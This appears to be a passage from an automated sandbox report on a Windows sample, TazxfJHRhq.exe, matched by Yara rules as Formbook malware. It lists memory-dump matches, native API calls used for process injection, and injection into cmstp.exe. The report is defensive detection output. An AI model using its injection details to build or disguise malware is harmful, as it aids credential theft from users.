Source: Yara match | File source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_004181C0 NtCreateFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00418270 NtReadFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_004182F0 NtClose,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_004183A0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00418272 NtReadFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ABB040 NtSuspendThread,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9A10 NtQuerySection,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ABA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ABAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9560 NtWriteFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB96D0 NtCreateKey,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ABA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9760 NtOpenProcess,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ABA770 NtOpenThread,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_004181C0 NtCreateFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00418270 NtReadFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_004182F0 NtClose,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_004183A0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00418272 NtReadFile,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046295D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046296E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046296D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046299A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629560 NtWriteFile,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046295F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629760 NtOpenProcess,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462A770 NtOpenThread,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046297A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046298F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046298A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046299D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629A20 NtResumeThread,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629A10 NtQuerySection,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_004181C0 NtCreateFile,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00418270 NtReadFile,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_004182F0 NtClose,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_004183A0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00418272 NtReadFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_004046A7
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00401030
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00408C5B
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00408C60
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041B569
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041BD6A
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00402D87
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00402D90
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041CEAF
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00402FB0
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041B7B5
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA20A0
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B420A8
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8B090
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B428EC
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B4E824
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31002
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A94120
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7F900
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B422AE
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAEBB0
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3DBD2
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B303DA
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B42B28
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8841F
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3D466
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA2581
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8D5E0
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B425DD
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A70D20
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B42D07
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B41D55
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B42EF7
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A96E30
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3D616
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B41FF1
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B4DFCE
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00401030
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00408C5B
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00408C60
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041B569
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041BD6A
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00402D87
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00402D90
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046AD466
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045F841F
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B1D55
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B2D07
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E0D20
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B25DD
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045FD5E0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04612581
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04606E30
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046AD616
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B2EF7
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B1FF1
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046BDFCE
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046BE824
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046A1002
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B28EC
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046120A0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B20A8
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045FB090
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04604120
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045EF900
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0469FA2B
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B22AE
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0460AB40
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B2B28
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046A03DA
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046ADBD2
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461EBB0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00408C5B
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00408C60
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041B569
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00402D87
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00402D90
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041CEAF
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00402FB0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041B7B5
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: String function: 00419F70 appears 36 times
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: String function: 00A7B150 appears 45 times
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 045EB150 appears 48 times
Source: TazxfJHRhq.exe, 00000000.00000003.211457812.000000001F016000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TazxfJHRhq.exe
Source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameCMSTP.EXE` vs TazxfJHRhq.exe
Source: TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TazxfJHRhq.exe
Source: TazxfJHRhq.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
